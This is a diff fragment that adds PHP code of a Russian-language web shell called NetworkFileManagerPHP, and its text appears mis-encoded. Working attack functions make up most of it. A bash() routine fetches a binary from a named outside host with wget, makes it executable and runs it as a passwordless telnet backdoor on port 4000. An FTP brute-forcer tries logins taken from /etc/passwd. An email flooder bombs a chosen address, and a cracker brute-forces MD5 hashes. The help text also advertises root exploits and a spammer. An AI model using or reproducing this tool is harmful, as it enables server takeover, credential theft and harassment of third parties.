+          echo "<tr><td align=center class=pagetitle>óêàçàí íå ïğàâëüíûé email.</td></tr> </table>";
+      }
+    } else {
+    }
+
+    if(@fclose ($afile)) {
+      echo "
+	   <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+  <tr><td align=center class=pagetitle>Ôàéë <b>\"".$address."\"</b> óñïåøíî çàêğûò!<br></td></tr> </table>";
+    } else {
+      echo "
+	   <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+  <tr><td align=center class=pagetitle>Ôàéë <b>\"".$address."\"</b> íå ìîãó çàêğûòü!<br></td></tr> </table>";    }
+  } else {
+    echo "íå ìîãó ïğî÷èòàòü ôàéë  <b>\"".$afile."\"</b> ...<br>";
+  }
+
+     $status2 ="Ñòàòóñ: ".$counter." emailîâ îòîñëàíî.";
+    echo "<br>";
+    echo "
+	  <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+  <tr><td align=center class=pagetitle>$status2</td></tr> </table>"; 
+   
+}       
+}
+
+# ïîìîùü
+function help() {
+ global $action,$REMOTE_ADDR,$HTTP_REFERER;
+ echo "<br>
+<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+<tr><td align=center class=pagetitle><b>Îïèñàíèå ñêğèïòà NetworkFileManagerPHP</b></font></b></td></tr>
+<tr><td bgcolor=#FFFFCC>
+
+<blockquote><br>
+Äàííûé ñêğèïò ïèñàëñÿ âíà÷àëå òîëüêî äëÿ àäìèíèñòğàòèğîâàíèÿ ñâîåãî õîñòèíãà, íî â ïğîöåññå íàïèñàíèÿ 
+îí ïîçâîëÿë ñâîáîäíî ïåğåìåùàòüñÿ ïî ïàïêàì õîñòèíãà è ïğîñìàòğèâàòü ğàçëè÷íóş èíôîğìàöèş, 
+êîòîğàÿ äîñòóïíà òîëüêî root, â ïğîöåññå ıâîëşöèè ñêğèïòà ÿ åãî äîïîëíèë óíèêàëüíûìè ñâîéñòâàìè, 
+êîòîğûå äîñòóïíû âñåãî â îäíîì ôàéëèêå, âñå îñòàëüíûå ôàéëû íåîáõîäèìûå äëÿ åãî ğàáîòû ñîçäàşòñÿ â ïàïêå,
+ãäå çàëèò NFM. Òî åñòü äàííûé ñêğèïò ïîëíîñòüş àâòîíîìåí çà èñêëş÷åíèåì ıêñïëîéòîâ, êîòîğûå õğàíÿòñÿ íà ìîåì 
+ñåğâåğå è äîñòóïíû äëÿ ñêà÷èâàíèÿ, ïîñğåäñòâîì PHP.<br><br>
+
+<b>NetworkFileManagerPHP</b> - ñêğèïò äëÿ ïîëíîãî àäìèíèñòğàòèğîâàíèÿ ñâîåãî ñàéòà, à òàêæå è õîñòèíãà, 
+ãäå ıòîò ñàéò õîñòèòñÿ.<br><br>
+Â íàïèñàíèè äàííîãî ñêğèïòà áûëè çàäåéñòâîâàíû íåêîòîğûå àâòîğñêèå ğàçğàáîòêè, óâàæàåìûõ ïğîãğàììèñòîâ:<br>
+- èäåÿ èñïîëüçîâàíèÿ àëèàñîâ â öåëÿõ îáëåã÷åíèÿ íàáîğà êîìàíä <b>(Rush)</b><br>
+- ïğîñòåíüêèé Áğóòôîğñåğ, êîòîğûé ïğîâåğÿåò ïàğîëü ïî åãî ëîãèíó <b>(TerraByte)</b><br>
+- èäåÿ ñ Mysql, ñïàñèáî ïîëüñêèì ïğîãğàììèñòàì<br>
+- îñòàëüíûå èäåè ìîè <b>(xoce)</b><br>
+- Ñïàñèáî çà òåñòèğîâàíèå ñêğèïòà âñåìó êàíàëó #hack.ru<br><br>
+
+<b>Âîçìîæíîñòè NetworkFileManagerPHP</b><br>
+1. Âîçìîæíîñòü ïğîñìàòğèâàòü ôàéëû õîñòèíãà 2-ìÿ ñïîñîáàìè (àêòóàëüíî åñëè îäèí èç íèõ îòêëş÷åí íà õîñòèíãå, ïğîñìîòğ îñóùåñòâëÿåòñÿ ÷åğåç fopen è cmd)<br> 
+2. Èñïîëüçîâàíèå àëüÿñîâ, òî åñòü óæå ãîòîâûå êîìàíäû, êîòîğûå ïğîïèñàíû â ğàñêğûâàşùåì ñïèñêå (èíòåğåñíû íîâè÷êàì, êîòîğûå íå çíàşò ëèíóêñà) <br>
+3. Ñêàíèğîâàíèå ñåğâåğà íà îòêğûòûå ïîğòû, ïîêàçûâàåò âñå îòêğûòûå ïîğòû íà ñåğâåğå è èõ ïğåäíàçíà÷åíèå. <br>
+4. Áğóò ñåğâåğà. Âñêğèïò âêëş÷åí ïğîñòåíüêèé áğóò ñåğâåğà, ïğîâåğêà ïàğîëÿ ïî åãî ëîãèíó.(äàííûå î ïîëüçîâàòåëÿõ áåğóòüñÿ èç ôàéëà /etc/passwd). Âñå ïîäîøåäøèå ïàğîëè çàïèñûâàşòñÿ â ôàéë ñ èìåíåì õîñòèíãà.<br> 
+5. Äàìï áàçû mysql. Âîçìîæíîñòü ñäàìïèòü ëşáóş áàçó Mysql, íàõîäÿùóşñÿ íà ıòîì õîñòèíãå. <br>
+6. Óñòàíîâêà bash shella. Âû ÷åğåç ñêğèïò âû ìîæåòå ïîëó÷èòü ïîëíîöåííûé áàêäîğ, êîòîğûé îòêğûâàåò íà 4000 ïîğòó òåëíåò ñîåäèíåíèå. (íåîáõîäèì äëÿ ğóòàíèÿ ñåğâåğà)<br> 
+7. Çàùèùåí çàêğèïòîâàííûì ïàğîëåì.<br> 
+8. Äîáàâëåíà âîçìîæíîñòü àğõèâàöèè ëşáîé ïàïêè íà õîñòèíãå ñ ïğèñâîåíèåì åé óíèêàëüíîãî èìåíè, êîòîğîå ãåíåğèòñÿ èç 6 ñèìâîëîâ.<br> 
+9. Âîçìîæíîñòü ïîñëàòü ñåáå íà ìûëî ëşáîé ôàéë íàõîäÿùèéñÿ íà ñåğâåğå (ìûëî ïğàâèòü â ñàìîì ñêğèïòå íà ñâîå) <br>
+10. Ïğîñìîòğ ëîêàëüíî êàğòèíîê (jpg, jpeg,gif,png), âàì òåïåğü íå íóæíû ïàğîëè îò ïîğíî ğåñóğñîâ, âû ìîæåòå âñå ïğîñìîòğåòü ëîêàëüíî!!!<br> 
+11. Ïğîñìîòğ ëîêàëüíî âèäåî (avi, mpg, mpeg), ÷òîáû íå êà÷àòü âñå ïîäğÿä ñ ïîğíî ğåñóğñîâ, âû ìîæåòå èõ ïğîñìîòğåòü ó ñåáÿ ÷åğåç Windows Media Player!!!<br> 
+12. Äîáàâëåíà áàçà ïóáëè÷íûõ ëîêàëüíûõ ıêñïëîéòîâ òàêèõ êàê ptrace, mremap, òàêæå â ñêğèïò âêëş÷åíû íåêîòîğûå ïîëåçíûå ïğîãğàììêè BNC (ğàçäåë áóäåò ïîñòîÿííî ïîïîëíÿòüñÿ ñ íîâûìè âåğñèÿìè)<br> 
+Äîáàâëåíà áàçà ïğèâàòíûõ ıêñïëîéòîâ òîëüêî ëîêàëüíûé ğóò) <br>
+- brk <br>
+- sendmail 8.1.*<br> 
+- mremap_pte <br>
+- r00t <br>
+- ku3 <br>
+- ex_bru <br>
+- ptrace/kmod<br> 
+- mremap2 <br>
+13. Ïåğåáîğ ïàğîëåé MD5 äî 32 ñèìâîëîâ(òåïåğü âàì íå íóæåí ïåğåáîğùèê John The Riper ëşáîé õîñòèíã, ó êîòîğîãî âêëş÷åíî PHP ñäåëàåò ıòî çà âàñ, ïğè÷åì âñå àáñîëşòíî ëåãàëüíî, ğàáîòàåò äàæå ïğè îáğûâå ñâÿçè, òî åñòü îäèí ğàç çàïóñòèëè è óøëè ñïàòü, ïğîñíóëèñü à ôàéëèê ñ ğàñøèôğîâàííûì ïàğîëåì óæå â äåğèêòîğèè ãäå çàëèò NFM)<br>
+14. Ïîäáîğ ïàğîëåé ê FTP ñ ñîçäàíèåì ëèñòà ñ ïàğîëÿìè íàëåòó ( â ëèñò ïàğîëåé âõîäèò:50 ñàìûõ ïîïóëÿğíûõ ïàğîëåé, îíè ïåğâûìè èäóò â ğàñøèôğîâêó, ïîòîì ïîäñòàíîâêà ê ëîãèíó ÷èñåë, íó à ïîòîì ğàíäîìíûå ïàğîëè êîòîğûå ñîçäàşòñÿ ñ èñïîëüçîâàíèåì ãëàñíûõ è ñîãëàñíûõ áóêâ, ïîëó÷àÿ ÷åëîâåêîïîäîáíûå âûğàæåíèÿ, êîòîğûå ìîãóò èñïîëüçîâàòüñÿ â ïàğîëÿõ)<br> 
+15. âêëş÷åí óíèêàëüíûé ñïàìåğ ìûë, ğàáîòàşùèé íà ëşáîì õîñòèíãå, âñå áàçû áóäåò ãåíåğèòü ğàíäîìíî, âàëèäíîñòü òàêèõ áàç áóäåò 40-45% ( èñïîëüçóåòñÿ óíèêàëüíûé àëãîğèòì ñîçäàíèÿ èìåí )<br>
+16. âîçìîæíîñòü çàãğóçèòü ëşáîé ôàéë ñ ëşáîãî õîñòèíãà íå ïğèáåãàÿ ê ôóíêöèè wget ( âñå ğåàëèçîâàíî ñğåäñòâàìè php, òåïåğü ìîæíî êà÷àòü ãèãàáàéòàìè.... ğàáîòàåò íå íà âñåõ õîñòèíãàõ )<br>
+17. Óäàëåíèå on-line
+18. Ñîôò íàêàçàíèÿ - ôëóä email, Easy Flood è Hard Flood.
+<b>Äàííûé ñêğèïò ïğåäóïğåæäàåò àäìèíèñòğàòîğîâ õîñòèíãà, ÷òî ïîğà ëàòàòü äûğû.
+İòèì ñêğèïòîì ìû ëèøü õîòåëè ïîêàçàòü, ÷òî ñ àïà÷åì øóòêè ïëîõè.</b><br><br>
+<b>Êàê íàñ íàéòè:</b><br>
+Irc server: irc.megik.net:6667 /join #hack.ru<br>
+Óâèäèìñÿ â ñåòè!!!<br></td></tr></table><br></blockquote>
+</td></tr>
+</table>";
+}
+
+function exploits($dir) {
+ global $action,$status, $file3,$file2,$tm,$PHP_SELF,$HTTP_HOST,$style_button, $public_site, $private_site, $private, $public, $title_ex, $title_exp;
+if (!isset($status)) upload_exploits(); 
+
+else 
+{
+
+$data = implode("", file($file3)); 
+$fp = @fopen($file2, "wb"); 
+fputs($fp, $data); 
+$ok = fclose($fp); 
+if($ok) 
+{ 
+$size = filesize($file2)/1024; 
+$sizef = sprintf("%.2f", $size);
+print "".exec("chmod 777 $public[1]")."";
+print "".exec("chmod 777 $public[2]")."";
+print "".exec("chmod 777 $public[3]")."";
+print "".exec("chmod 777 $private[1]")."";
+print "".exec("chmod 777 $private[2]")."";
+print "".exec("chmod 777 $private[3]")."";
+print "".exec("chmod 777 $private[4]")."";
+print "".exec("chmod 777 $private[5]")."";
+print "".exec("chmod 777 $private[6]")."";
+print "".exec("chmod 777 $private[7]")."";
+print "".exec("chmod 777 $private[8]")."";
+
+print "<br><TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#0066CC BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td><center><font color='#FFFFCC' face='Tahoma' size = 2>Âû çàãğóçèëè: <b>ôàéë ğàçìåğîì</b> (".$sizef."êÁ) </font></center></td></tr></table>"; 
+} 
+else 
+{ 
+print "×òî-òî íå òàê."; 
+} 
+} 
+}
+
+
+# FTP-áğóò
+function ftp() {
+ global $action, $ftp_server, $filename, $HTTP_HOST;
+ ignore_user_abort(1);
+ echo "<br><TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=600 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td align=center class=pagetitle>FTP-server: <b>$ftp_server</b></td></tr>";
+
+ $fpip = @fopen ($filename, "r");
+ if ($fpip) {
+  while (!feof ($fpip)) { 
+   $buf = fgets($fpip, 100);
+   ereg("^([0-9a-zA-Z]{1,})\:",$buf,$g);
+   $conn_id=ftp_connect($ftp_server);
+   if (($conn_id) && (@ftp_login($conn_id, $g[1], $g[1]))) {
+   
+   $f=@fopen($HTTP_HOST,"a+");
+   fputs($f,"$g[1]:$g[1]\n");
+     echo "<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=600 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td align=center class=pagetitle><b>Connected with login:password - ".$g[1].":".$g[1]."</b></td></tr></table>";
+    
+   ftp_close($conn_id);
+   fclose($f);
+   } else {
+    echo "<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#FFFFCC BORDER=1 width=600 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td align=center>".$g[1].":".$g[1]." - <b>failed</b></td></tr></table>";
+   }
+  }
+ }
+}
+
+function tar() {
+ global $action, $filename;
+ set_time_limit(0);
+ echo "<br>
+<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+<tr><td align=center class=pagetitle><b>Àğõèâàöèÿ äàííûõ</b></font></b></td></tr>
+<tr><td bgcolor=#FFFFCC><br><blockquote> ñâÿçè ñ ğàçëè÷íûìè íàñòğîéêàìè ñåğâåğîâ, ÿ íå ñòàë ïîëíîñòüş àâòîìàòèçèğîâàòü ñêğèïò ïîä êàæäûé ñåğâåğ. Âàì òîëüêî îñòàíåòñÿ ïîäïğàâèòü òî÷íûå ïóòè ê ïàïêå äîìåíà è íàæàòü íà ââîä, âñå äàííûå ğàñïîëîæåííûå â âûáğàííîé ïàïêå çààğõèâèğóşòñÿ â àğõèâ tar.gz.<br><br>
+<b>Âíèìàíèå!!!</b><br>Òàê êàê ôàéë <b>passwd</b> ìîæåò áûòü áîëüøèì, òî îòêğûòèå âñåõ ïîëüçîâàòåëåé äàííîãî õîñòèíãà ïîòğåáóåò îïğåäåëåííîãî âğåìåíè.<br><br>
+<b>Ğåêîìåíäóåòñÿ!!!</b><br>Îòêğûòü äàííóş îïöèş â îòäåëüíîì îêíå, ÷òîáû ïğè ïğîñìîòğå õîñòèíãà îáğàùàòüñÿ ê íåé è àğõèâèğîâàòü èíôîğìàöèş êîòîğàÿ âàñ çàèíòåğåñóåò.</blockquote></td></tr>
+</table><br>";
+
+$http_public="/public_html/";
+$fpip = @fopen ($filename, "r");
+if ($fpip) {
+ while (!feof ($fpip)) { 
+  $buf = fgets($fpip, 100);
+  ereg("^([0-9a-zA-Z]{1,})\:",$buf,$g);
+  $name=$g[1];
+  echo "
+<TABLE CELLPADDING=0 CELLSPACING=0 width='600' bgcolor=#184984 BORDER=1 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+<form method='get' action='$PHP_SELF' >
+<tr><td align=center colspan=2 class=pagetitle><b>Àğõèâàöèÿ <u>$name.tar.gz</u>:</b></td></tr>
+<tr>
+<td valign=top><input type=text name=cm size=90 class='inputbox'value='tar -zc /home/$name$http_public -f $name.tar.gz' ></td>
+<td valign=top><input type=submit value='Äàâè' class=button1 $style_button></td>
+</tr></form></table>";
+  }
+ } 
+}
+
+
+
+# Óñòàíîâêà øåëà
+function bash() {
+ global $action, $port_bind, $pass_key;
+
+echo "<br>
+<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+<tr><td align=center class=pagetitle><b>Óñòàíîâêà øåëà</b></font></b></td></tr>
+<tr><td bgcolor=#FFFFCC><br>Äàííûé øåë óñòàíàâëèâàåòñÿ íà 4000 ïîğò, äîñòóï áåç ïàğîëÿ ïî òåëíåò ñîåäèíåíèş</td></tr>
+</table><br>";
+
+echo "
+<TABLE CELLPADDING=0 CELLSPACING=0 width='500' bgcolor=#184984 BORDER=1 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+<tr><td align=center class=pagetitle><b> Äàííûå ïî øåëó çàïèñàíû â ôàéë <u><i>s</i></u></b></td></tr>";
+
+echo "<tr><td align=center bgcolor=#FFFFCC><b>&nbsp; ".exec("wget http://vzlomanet.x25.net.ru/adm/exploits/bash/s")."</b> Cêà÷èâàåì...</td></tr>";
+echo "<tr><td align=center bgcolor=#FFFFCC><b>&nbsp; ".exec("chmod 777 s")."</b> Óñòàíàâëèâàåì ïğàâà...</td></tr>";
+echo "<tr><td align=center bgcolor=#FFFFCC><b>&nbsp; ".exec("./s")."</b> Çàïóñêàåì...íà 4000 ïîğò</td></tr>";
+# echo "<tr><td align=center bgcolor=#FFFFCC><b>&nbsp; ".exec("rm s")."</b> Óäàëÿåì <u>s</u>...</td></tr>";
+echo"</table>";
+
+ }
+ 
+ function flud() {
+ global $action, $check_box, $status, $emailflood, $kol, $wait, $sizeletter, $subject, $body;
+set_time_limit(0); 
+ignore_user_abort(1); 
+
+echo "<br>
+<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+<tr><td align=center class=pagetitle><b>Ôëóäåğ Email</b></font></b></td></tr>
+<tr><td bgcolor=#FFFFCC><br><blockquote>Òàê óæ ïîëó÷èëîñü, ÷òî ğàáîòàÿ â èíòåğíåòå, ìû ÷àñòåíüêî íàğûâàåìñÿ íà ìîøåííèêîâ èëè íàñ ïîäñòàâëÿşò. 
+Íî åñëè ìû èìååì ìûëî îáèä÷èêà, òî ìû ìîæåì åìó ïîäãîâíèòü æèòèå. Äëÿ ıòèõ öåëåé è ïèñàëàñü äàííàÿ îïöèÿ. Ñ ïîìîùüş ıòîé îïöèè âû ñìîæåòå çàôëóäèòü íåãîäÿÿ!!!</blockquote>
+</td></tr>
+</table><br>";
+echo "
+ <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+ <form action='$PHP_SELF?action=flud' method=post>
+ <tr><td align=left valign=top colspan=4 class=pagetitle>
+ &nbsp;&nbsp;<b>Ãåíåğàòîğ ôëóäà:</b></td></tr>
+ <tr> <tr><td align=left valign=top colspan=4 bgcolor=#FFFFCC width=500>
+ &nbsp;&nbsp;Äëÿ êà÷åñòâà ôëóäà, ôëóäåğ Email, ğàçáèò íà äâå âåğñèè: <br>
+ &nbsp;<b>1.</b> Easy Flood - ıòî òóïîé ôëóä, íî áîëåå áûñòğûé, íî åãî ëåãêî óäàëèòü, â ñóòêè çàñèğàåòñÿ ÿùèê îêîëî 100000 ïèñåì, íåêîòîğûå ñåğâåğà ôèëüòğóşò åãî<br>
+ &nbsp;<b>2.</b> Hard Flood - ïğîäâèíóòûé ôëóä, íî áîëåå ğåñóğñîåìêèé, ïîääåëûâàåò îò êîãî ôëóä, à òàêæå óìååò åùå êó÷ó âîçìîæíîñòåé</td></tr>
+ <tr><td align=left class=pagetitle>&nbsp;&nbsp;<input type='radio' name='check_box' value ='1'>&nbsp;&nbsp; <b>Easy Flood</b></td></tr>
+ <tr><td align=left class=pagetitle>&nbsp;&nbsp;<input type='radio' name='check_box' value ='2'>&nbsp;&nbsp; <b>Hard Flood</b></td></tr>
+
+<tr><td width=500 align=center colspan=2><input type='submit' value='Íà÷àòü' class=button1 $style_button>
+</td></tr>
+ 
+ </form></table>";
+ 
+if ($check_box == "1"){ 
+ echo "
+ <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+ <form action='$PHP_SELF?action=flud&status=easy' method=post>
+ <tr><td align=center class=pagetitle colspan=2><font color=#76A8AB><b> .:Easy Flood:. </b></font></b></td></tr>
+<tr><td align=left class=pagetitle width=250>&nbsp;&nbsp;Email ãàäà:</td>
+<td align=left width=250><input class='inputbox' type='text' name='emailflood' size=45></td></tr>
+<tr><td align=left class=pagetitle width=250>&nbsp;&nbsp;Êîëè÷åñòâî ïèñåì:</td>
+<td align=left width=250><input class='inputbox' type='text' name='kol' size=15></td></tr>
+<tr><td align=left class=pagetitle width=250>&nbsp;&nbsp;Èíòåğâàë îòïğàâêè (ñåê):</td>
+<td align=left width=250><input class='inputbox' type='text' name='wait' size=15></td></tr>
+<tr><td align=left class=pagetitle width=250>&nbsp;&nbsp;Ğàçìåğ ïèñüìà (êá):</td>
+<td align=left width=250><input class='inputbox' type='text' name='sizeletter' size=45></td></tr>
+<tr><td align=left class=pagetitle width=250>&nbsp;&nbsp;Òåìà ñîîáùåíèÿ:</td>
+<td align=left width=250><input class='inputbox' type='text' name='subject' size=45></td></tr>
+<tr><td align=left class=pagetitle width=250>&nbsp;&nbsp;Òåêñò ïèñüìà:</td>
+<td align=left width=250><textarea name='body' rows='13' cols='50' class=inputbox> </textarea></td></tr>
+<tr><td width=500 align=center colspan=2>
+<input type='submit' value='Ãåíåğèòü' class=button1 $style_button >
+<INPUT TYPE='hidden' NAME='$chislo'>
+</td></tr>
+ </form></table>";
+ 
+
+} 
+
+
+ if ($status == "easy"){
+  error_reporting(63); if($emailflood=="") { print
+"<script>history.back(-1);alert('Íå çàïîëíåíî ïîëå: <Email ãàäà>')</script>";exit;}
+ error_reporting(63); if($kol=="") { print
+"<script>history.back(-1);alert('Íå çàïîëíåíî ïîëå: <Êîëè÷åñòâî ïèñåì>')</script>";exit;}
+ error_reporting(63); if($wait=="") { print
+"<script>history.back(-1);alert('Íå çàïîëíåíî ïîëå: <Èíòåğâàë îòïğàâêè>')</script>";exit;}
+ error_reporting(63); if($sizeletter=="") { print
+"<script>history.back(-1);alert('Íå çàïîëíåíî ïîëå: <Ğàçìåğ ïèñüìà>')</script>";exit;}
+ error_reporting(63); if($subject=="") { print
+"<script>history.back(-1);alert('Íå çàïîëíåíî ïîëå: <Òåìà ñîîáùåíèÿ>')</script>";exit;}
+ error_reporting(63); if($body=="") { print
+"<script>history.back(-1);alert('Íå çàïîëíåíî ïîëå: <Òåëî ïèñüìà>')</script>";exit;}
+
+ 
+$text=strlen($body)+1; 
+$sizeletter_kb=(1024/$text)*$sizeletter;
+$sizeletter_kb=ceil($sizeletter_kb);
+
+for ($i=1; $i<=$sizeletter_kb; $i++) {
+$msg=$msg.$body." ";
+}
+
+     
+for ($i=1; $i<=$kol; $i++){
+ if($emailflood != "") {
+ 
+@mail($emailflood, $body, $msg, "From: $subject");
+ $sec = $wait * 1000000;
+      usleep($sec);
+	  }
+	 
+}
+
+}
+
+ 
+ }
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+function crypte() {
+ global $action,$md5a,$sha1a,$crc32, $key,$string;
+echo "<br>
+<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+<tr><td align=center class=pagetitle><b>Êğèïòîâàíèå äàííûõ</b></font></b></td></tr>
+<tr><td bgcolor=#FFFFCC><br><blockquote>Íà äàííûé ìîìåíò â èíòåğíåòå ñóùåñòâóåò îãîğîìíîå êîëëè÷åñòâî ïğîãğàìì è ñêğèïòîâ, êîòîğûå èñïîëüçóşò ğàçëè÷íûå ìåòîäû øèôğîâàíèÿ ïàğîëåé, 
+ñ ïîìîùüş NFM âû ìîæåòå ïîëó÷èòü äîñòóï ê èçìåíåíèş ıòèõ äàííûõ, íî áûâàåò íóæíûì èçìåíèòü äàííûå íà ñâîè, äëÿ ıòîãî ÿ âûáğàë ñàìûå ïîïóëÿğíûå ìåòîäû øèôğîâàíèÿ.</blockquote></td></tr>
+</table>";
+
+echo "
+ <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+ <form enctype='multipart/form-data' action='$PHP_SELF?action=crypte' method=post>
+ <tr><td align=left valign=top colspan=3 class=pagetitle>
+ &nbsp;&nbsp;<b>Ïîïóëÿğíûå ìåòîäû øèôğîâàíèÿ, ïîääåğæèâàåìûå áèáëèîòåêîé MHASH:</b></td></tr>
+ <tr><td align=left valign=top colspan=3 bgcolor=#FFFFCC>
+ &nbsp;&nbsp;<b>MD5 </b>(ñàìûé ğàñïğàñòğàíåííûé ìåòîä øèôğîâàíèÿ äàííûõ)</td></tr>
+ <tr>
+ <td class=pagetitle width=400>&nbsp;Ğåçóëüòàò:&nbsp;&nbsp;<font color=#ffffcc><b>".md5($md5a)."</b></font></td>
+ <td class=pagetitle width=100>&nbsp;Ââîä:&nbsp;<font color=red><b>".$md5a."</b></font></td></tr>
+ <tr><td align=center width=400><input class='inputbox'type='text' name='md5a' size='50' value='' id='md5a'></td>
+ <td align=center width=100><input type='submit' value='Crypt MD5' class=button1 $style_button></td></tr>
+ 
+ </form></table>";
+ echo "
+ <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+ <form enctype='multipart/form-data' action='$PHP_SELF?action=crypte' method=post>
+ <tr><td align=left valign=top colspan=3 bgcolor=#FFFFCC>
+ &nbsp;&nbsp;<b>SHA1 </b>(òîæå äîâîëüíî ïîïóëÿğíûé ìåòîä øèôğîâàíèÿ äàííûõ)</td></tr>
+ <tr>
+ <td class=pagetitle width=400>&nbsp;Ğåçóëüòàò:&nbsp;&nbsp;<font color=#ffffcc><b>".sha1($sha1a)."</b></font></td>
+ <td class=pagetitle width=100>&nbsp;Ââîä:&nbsp;<font color=red><b>".$sha1a."</b></font></td></tr>
+ <tr><td align=center width=400><input class='inputbox' type='text' name='sha1a' size='50' value='' id='sha1a'>
+ </td><td align=center width=100><input type='submit' value='Crypt SHA1' class=button1 $style_button></td></tr>
+ 
+ </form></table>";
+echo "
+ <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+ <form enctype='multipart/form-data' action='$PHP_SELF?action=crypte' method=post>
+ <tr><td align=left valign=top colspan=3 bgcolor=#FFFFCC width=500>
+ &nbsp;&nbsp;<b>CRC32 </b>(â îñíîâíîì èñïîëüçóåòñÿ ïğè âû÷èñëåíèè êîíòğîëüíûõ ñóìì äëÿ ïğîâåğêè öåëîñòíîñòè äàííûõ, íî è â íåêîòîğûõ ôîğóìàõ â êà÷åñòâå øèôğîâêè ïàğîëåé)</td></tr>
+ <tr>
+ <td class=pagetitle width=400>&nbsp;Ğåçóëüòàò:&nbsp;&nbsp;<font color=#ffffcc><b>".crc32($crc32)."</b></font></td>
+ <td class=pagetitle width=100>&nbsp;Ââîä:&nbsp;<font color=red><b>".$crc32."</b></font></td></tr>
+ <tr><td align=center width=400><input class='inputbox' type='text' name='crc32' size='50' value='' id='crc32'></td><td width=100 align=center><input type='submit' value='Crypt CRC32' class=button1 $style_button></td></tr>
+ 
+ </form></table>";
+ 
+ }
+
+function decrypte() {
+ global $action,$pass_de,$chars_de,$dat,$date;
+set_time_limit(0);
+ignore_user_abort(1);
+
+echo "<br>
+<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+<tr><td align=center class=pagetitle><b>Äåêîäèğîâàíèå äàííûõ</b></font></b></td></tr>
+<tr><td bgcolor=#FFFFCC><br><blockquote>Âñåì èçâåñòíî, ÷òî md5 íåëüçÿ ìãíîâåííî äåêîäèğîâàòü, òàê êàê èñïîëüçóåòñÿ îäíîíàïğàâëåííîå øèôğîâàíèå (àëãîğèòì õıøèğîâàíèÿ), 
+ ñîçäàşùåå óíèêàëüíûé îòïå÷àòîê èñõîäíûé ñòğîêè, à èìåííî 128-áèòîâûé (md5).  íàñòîÿùåå âğåìÿ ñ÷èòàåòñÿ íåâîçìîæíûì ïî ıòîìó îòïå÷àòêó
+ âîñòàíîâèòü èñõîäíûå äàííûå, îáğàòèâ ïğîöåäóğó, ÿ æå ïîïğîáóş ïğèìåíèòü ìåòîä «ãğóáîé ñèëû», à èìåííî ïîëíûé ïåğåáîğ äî ñîâïàäåíèÿ âõîäíûõ è âûõîäíûõ äàííûõ.</blockquote></td></tr>
+</table>";
+
+if($chars_de==""){$chars_de="";}
+ echo "
+ <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+ <form action='$PHP_SELF?action=decrypte' method=post name=hackru><tr><td align=left valign=top colspan=3 class=pagetitle>
+ &nbsp;&nbsp;<b>Äåøèôğîâêà äàííûõ:</b></td></tr>
+ <tr> <tr><td align=left valign=top colspan=3 bgcolor=#FFFFCC width=500>
+ &nbsp;&nbsp;<b>Decrypte MD5</b>(ğàñøèôğîâêà õåøà çàâèñèò îò äëèíû ïàğîëÿ è çàíèàåò îïğåäåëåííîå êîëëè÷ñåòâî âğåìåíè)</td></tr>
+ <tr>
+ <td class=pagetitle width=400 >&nbsp;MD5 õåø:&nbsp;&nbsp;<font color=#ffffcc><b>".$pass_de."</b></font></td><td width=100 align=center>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<input type=reset value=Î÷èñòèòü class=button1 $style_button></td>
+  <tr><td align=left width=400 >&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<textarea  class='inputbox' name='chars_de' cols='50' rows='5'>".$chars_de."</textarea></td>
+  <td class=pagetitle width=120 valign=top><b>Ïåğåáîğ áóêâ:</b><br><font color=red><b><u>ENG:</u></b></font>
+   <a class=menu href=javascript:ins('abcdefghijklmnopqrstuvwxyz')>[a-z]</a>
